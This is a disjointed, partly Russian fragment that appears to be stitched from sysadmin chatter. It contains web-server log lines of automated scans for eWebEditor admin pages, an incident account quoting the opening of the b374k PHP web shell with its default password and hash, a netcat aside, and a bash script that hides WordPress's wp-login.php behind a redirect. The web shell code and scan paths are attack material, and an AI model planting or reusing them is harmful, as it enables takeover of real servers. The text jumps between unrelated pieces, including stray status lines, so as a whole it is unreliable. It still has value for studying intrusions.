121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /admin888/ewebeditor/fsmkadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:20 -0700] "HEAD /eweb/dqcqadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /asp_bin/webeditor/jhyyadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:22 -0700] "HEAD /admin/editor/usumadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /loknewebeditor/admin/login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:23 -0700] "HEAD /ewebeditor/mpemadmin_login.asp HTTP/1.1" 404 — "-" "-"
Жуйк, зачем он это делает?
No customer impact expected
No interruption expected
2. Проходит две недели, появляются новые index.php уже с другим содержанием. Причина — залитый в первый раз htdocs/forum/files.php:
<?php
/ (Web Shell b374k r3c0d3d by x'1n73ct|default pass:"1n73ction") /
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
<.... to be continued ...>
— netcat'ом
— мда. Суровые русские админы настолько суровы...
#!/bin/bash
export PATH=/sbin/:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/secure/bin
if [ `fgrep 'WordPress User Page' wp-login.php|wc -l` -le 0 ]; then
echo File wp-login.php is not Wordpress-related
exit 2
fi
cp -p wp-login.php wp-login.backup.php
cp -p wp-login.php wp-login.secure.php
sed -i.bak 's/wp-login\.php/wp-login\.secure\.php/g' wp-login.secure.php
echo "<?php
\$action=\$_GET['action'];
\$_wpnonce=\$_GET['_wpnonce'];
if (!is_null(\$action)) header(\"Location: wp-login.secure.php?action=\$action&_wpnonce=\$_wpnonce\");
else header(\"Location: wp-login.secure.php\"); ?> " > wp-login.php